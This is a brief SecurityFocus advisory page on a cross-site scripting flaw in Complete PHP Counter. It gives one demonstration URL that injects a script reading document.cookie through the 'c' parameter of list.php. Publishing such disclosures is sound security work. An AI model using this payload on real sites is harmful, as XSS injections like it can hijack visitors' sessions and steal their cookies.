info
discussion
exploit
solution
references
Complete PHP Counter Cross-Site Scripting Vulnerability
No exploit is required.
A demonstration URI has been provided:
http://www.example.com/[php-counter]/list.php?c='><script>alert(document.cookie);</script>
Privacy Statement
Copyright 2010, SecurityFocus
